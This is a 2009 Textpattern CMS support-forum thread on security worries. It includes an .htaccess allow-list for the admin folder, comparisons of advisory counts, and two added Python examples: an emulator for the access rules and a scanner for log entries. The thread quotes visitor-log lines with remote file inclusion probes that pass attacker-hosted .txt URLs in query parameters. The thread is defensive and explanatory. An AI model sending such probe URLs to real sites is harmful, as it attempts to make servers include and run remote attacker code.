
Textpattern CMS support forum


#13 2009-08-13 22:38:09

MattD
Plugin Author
From: Monterey, California
Registered: 2008-03-21
Posts: 1,254

Re: How to begin setup installation

What is in your .htaccess file in that directory?


My Plugins

Piwik Dashboard, Google Analytics Dashboard, Minibar, Article Image Colorpicker, Admin Datepicker, Admin Google Map, Admin Colorpicker


#14 2009-08-13 22:45:31

hcgtv
Plugin Author
From: Key Largo, Florida
Registered: 2005-11-29
Posts: 2,722

Re: How to begin setup installation

sarah wrote:

I’ve been on a few digital security sites, and Textpattern seems to have a lot of security bugs.

Hi Sarah. I run PHPXref; my visitor logs are full of URLs that end in .txt or funky-looking URLs trying to exploit some flaw in the software. Mind you, these script kiddies and/or bots are not very smart; many of them are trying to exploit known flaws in the PHP software I cross-reference on my site. The site has been running fine for almost 4 years now, not a single exploit, hiccup or what have you.

It is advised to rename the textpattern folder.

Place an .htaccess in the /textpattern folder like this one:

<IfModule mod_rewrite.c>
 RewriteEngine On
 # Allow-list: every RewriteCond below is negated and they are ANDed, so the
 # RewriteRule only fires (returning 403 Forbidden) when NONE of these paths
 # match the request. REQUEST_FILENAME is the full filesystem path, which is
 # why the patterns are anchored only on the right with "$".
 RewriteCond %{REQUEST_FILENAME} !textpattern(/setup)?/?$
 RewriteCond %{REQUEST_FILENAME} !textpattern/((setup/)?index|css)\.php$
 RewriteCond %{REQUEST_FILENAME} !textpattern/textpattern\.(css|js)$
 RewriteCond %{REQUEST_FILENAME} !textpattern/jquery\.js$
 RewriteCond %{REQUEST_FILENAME} !textpattern/txp_img/.+\.(jpg|gif|png)$
 # Anything else under /textpattern (config.php, lib/, include/, ...) is refused
 RewriteRule ^(.*) - [F]
</IfModule>

Like Els said, please point us to these security bulletins.

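To see what the allow-list above actually lets through before dropping it into a live site, here is an added example (not code from the post or from Textpattern) that applies the same five RewriteCond patterns with Python’s re module to a handful of request paths. The document root and the sample paths are assumptions for illustration; the patterns are copied verbatim from the .htaccess.

```python
import re

# The five allow patterns from the .htaccess above, copied verbatim. mod_rewrite
# tests them against %{REQUEST_FILENAME} (the full filesystem path), so they are
# anchored only on the right with "$".
ALLOW_PATTERNS = [
    r"textpattern(/setup)?/?$",
    r"textpattern/((setup/)?index|css)\.php$",
    r"textpattern/textpattern\.(css|js)$",
    r"textpattern/jquery\.js$",
    r"textpattern/txp_img/.+\.(jpg|gif|png)$",
]
_COMPILED = [re.compile(p) for p in ALLOW_PATTERNS]

# Assumed document root for the examples; not taken from the forum post.
DOCROOT = "/var/www/example.org"


def is_allowed(request_filename):
    """Each RewriteCond is negated and the conditions are ANDed, so the [F] rule
    fires only when no pattern matches. A request is allowed iff one matches."""
    return any(p.search(request_filename) for p in _COMPILED)


def decide(uri_path):
    """Map a URI path under /textpattern to the verdict the rules would give."""
    return "allow" if is_allowed(DOCROOT + uri_path) else "403 Forbidden"


def audit(uri_paths):
    """Return {path: verdict} for a batch of request paths."""
    return {p: decide(p) for p in uri_paths}


if __name__ == "__main__":
    # Illustrative paths: the public entry points, two internal files, and
    # two uploads in txp_img/ (one image, one PHP file).
    sample = [
        "/textpattern/",
        "/textpattern/index.php",
        "/textpattern/setup/index.php",
        "/textpattern/css.php",
        "/textpattern/jquery.js",
        "/textpattern/txp_img/logo.png",
        "/textpattern/txp_img/shell.php",
        "/textpattern/config.php",
        "/textpattern/lib/txplib_db.php",
    ]
    for path, verdict in audit(sample).items():
        print(f"{verdict:14} {path}")
```

Two things the emulation makes visible: the verdict is decided purely on the suffix of the filesystem path, so a file in txp_img/ is served only if its name ends in .jpg, .gif or .png, and textpattern/setup/ stays reachable, so these rules do nothing to close the installer directory once setup is finished.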

#15 2009-08-14 10:08:16

ruud
Developer Emeritus
From: a galaxy far far away
Registered: 2006-06-04
Posts: 5,068

Re: How to begin setup installation

sarah wrote:

… but I don’t agree that textpattern is secure enough.
I’ve been on a few digital security sites, and Textpattern seems to have a lot of security bugs. It is advised to rename the textpattern folder.

Can you provide URLs for websites that make such claims?

Renaming a folder wouldn’t fix a security bug, just obscure it. TXP devs prefer fixing bugs instead of hiding them.


#16 2009-08-14 11:26:23

sarah
Member
Registered: 2009-08-13
Posts: 46

Re: How to begin setup installation

Els, hcgtv and Ruud, here are the sites referencing Textpattern’s security bugs:

http://www.securityfocus.com/bid/27606/discuss

Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.

A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.

These issues affect Textpattern 4.0.5; other versions may also be vulnerable.

http://secunia.com/advisories/28793/


#17 2009-08-14 11:31:29

sarah
Member
Registered: 2009-08-13
Posts: 46

Re: How to begin setup installation

MattD, you asked what was in my .htaccess file; well, there are 2 .htaccess files.

The one which is there upon installation, and the other one in the “myadmin” folder, which I created, is basically the security code which comes from Textpattern’s web page on “how to make Textpattern more secure”.

The code in the latter .htaccess file is almost identical to the code that hcgtv posted, on post 14.


#18 2009-08-14 11:40:38

sarah
Member
Registered: 2009-08-13
Posts: 46

Re: How to begin setup installation

Hcgtv,

In regards to PHPXref, I take it that this is the site you got the software from:

http://phpxref.com/

Can you tell me exactly what you downloaded to view visitor logs?

It’s comforting to know that the buggy scripts that hackers use are unsuccessful in intruding into your site.

It’s just that Textpattern, which doesn’t seem to be as popular as “CMS Made Simple”, seems to have had more known bugs than CMS Made Simple.

I was concerned…


#19 2009-08-14 11:50:33

iblastoff
Plugin Author
From: Toronto
Registered: 2006-06-11
Posts: 1,197

Re: How to begin setup installation

sarah wrote:

It’s just that Textpattern, which doesn’t seem to be as popular as “CMS Made Simple”, seems to have had more known bugs than CMS Made Simple.

I highly doubt that. Did you look at CMS Made Simple’s Secunia statistics? It has WAY more. http://secunia.com/advisories/26928/


#20 2009-08-14 12:50:32

hcgtv
Plugin Author
From: Key Largo, Florida
Registered: 2005-11-29
Posts: 2,722

Re: How to begin setup installation

sarah wrote:

Can you tell me exactly what you downloaded to view visitor logs?

Textpattern has a tab in the backend that lets you see who’s visited your site.

Let me give you examples of what I see:

211.75.220.49   index.php?c=http://pekipug.com/id1.txt??
131.203.76.246   index.php?themesdir=http://www.edu-math.com/upload_question_images/fx29id1.txt?
211.75.220.49   index.php?template=http://pekipug.com/id1.txt??
190.144.44.36   /?page=http://www.freewebtown.com/fucku8/fx29id1.txt??
64.202.120.88   /index.php?page=http://www.oming.com//master-id.txt?

Those are just some I picked from the last hour; this kind of stuff goes on all day. If Textpattern was vulnerable, as the links you provide say, don’t you think my site would have been hacked by now?

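The log lines quoted in that post are remote file inclusion (RFI) probes: each one sends an absolute URL in a query parameter (c, themesdir, template, page) hoping the script passes it straight to include() or require(), and the trailing ? is there so that whatever the vulnerable script appends becomes a query string to the attacker’s server. The scanner below is an added example, not code from the forum or from Textpattern, that pulls such requests out of a log in the “ip  request” form shown above. The sample log is constructed from the five quoted lines plus two ordinary requests from a documentation-range address; the line format and the finding fields are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: the five probe lines quoted in the post above plus two
# ordinary requests from a documentation-range IP (198.51.100.7), so the
# scanner has legitimate traffic to ignore.
SAMPLE_LOG = """\
211.75.220.49   index.php?c=http://pekipug.com/id1.txt??
131.203.76.246   index.php?themesdir=http://www.edu-math.com/upload_question_images/fx29id1.txt?
211.75.220.49   index.php?template=http://pekipug.com/id1.txt??
190.144.44.36   /?page=http://www.freewebtown.com/fucku8/fx29id1.txt??
64.202.120.88   /index.php?page=http://www.oming.com//master-id.txt?
198.51.100.7   /index.php?s=article&id=12
198.51.100.7   /textpattern/index.php?event=article
"""

# Assumed log shape: a dotted-quad source address, whitespace, the request.
LINE_RE = re.compile(r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<req>\S+)\s*$")
# A parameter value that is itself an absolute URL is the signature of an RFI
# probe: the attacker hopes the value reaches include()/require() unchanged.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def remote_include_params(request):
    """Return (param, url) pairs whose value is an absolute URL."""
    query = urlsplit(request).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(value)]


def scan(log_text):
    """Return one finding per (request line, suspicious parameter)."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; skipped rather than guessed at
        for name, value in remote_include_params(m["req"]):
            findings.append({
                "ip": m["ip"],
                "param": name,
                "payload_host": urlsplit(value).hostname or "",
                "payload": value,
                # Trailing '?' turns anything the vulnerable script appends to
                # the include path into a query string for the attacker's host.
                "trailing_query": value.endswith("?"),
            })
    return findings


def top_sources(findings):
    """Count probes per source IP; the obvious input for a block list."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']:16} {h['param']:10} -> {h['payload_host']}")
    print(top_sources(hits).most_common())
```

The scanner only flags what it can see in the request line; a payload fetched from an attacker host is confirmed as harmless only if the parameter never reaches an include, which is exactly the check the allow-list and the application code have to provide.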

#21 2009-08-14 13:11:25

PascalL
Member
From: Switzerland
Registered: 2009-03-09
Posts: 132

Re: How to begin setup installation

sarah wrote:

Els, hcgtv and Ruud, here are the sites referencing Textpattern’s security bugs:

http://www.securityfocus.com/bid/27606/discuss

Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.

A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.

These issues affect Textpattern 4.0.5; other versions may also be vulnerable.

http://secunia.com/advisories/28793/

Thanks for the links!
In fact, these sites confirm that Textpattern is very secure! There’s been only one discovered (mild) vulnerability over the years, in Textpattern 4.0.5.

Some lists of vulnerabilities:
Textpattern
Wordpress
CMS Made Simple

As said in the disclaimer, don’t compare software by the number of vulnerabilities found. The important part is the developers’ reactivity in correcting them.

Last edited by PascalL (2009-08-14 13:11:57)


#22 2009-08-14 13:27:14

sarah
Member
Registered: 2009-08-13
Posts: 46

Re: How to begin setup installation

iblastoff wrote:

I highly doubt that. Did you look at CMS Made Simple’s Secunia statistics? It has WAY more. http://secunia.com/advisories/26928/

I see…

It’s just I couldn’t find any sites referencing CMS Made Simple’s bugs when doing a google search…


#23 2009-08-14 13:32:14

sarah
Member
Registered: 2009-08-13
Posts: 46

Re: How to begin setup installation

hcgtv,

Thank you so much for the info you provided about the tab in Textpattern with the text files hackers try to input into your site!

But what does “PHPXref” do for you, and how?

Also, what are the signs that your site has been hacked?

Thanks!


#24 2009-08-14 13:42:46

sarah
Member
Registered: 2009-08-13
Posts: 46

Re: How to begin setup installation

PascalL, thanks for the links to the site you posted.

You’re right- CMS Made Simple is worse than Textpattern.

Going by the info on the links of the site you provided, this is how the vulnerabilities of “Textpattern” compare to “CMS Made Simple’s” vulnerabilities:

http://secunia.com/advisories/product/17462/?task=advisories
http://secunia.com/advisories/product/13129/?task=advisories

Textpattern: 1 Secunia advisory, 3 vulnerabilities

CMS Made Simple: 7 Secunia advisories, 13 vulnerabilities

Last edited by sarah (2009-08-14 14:14:11)

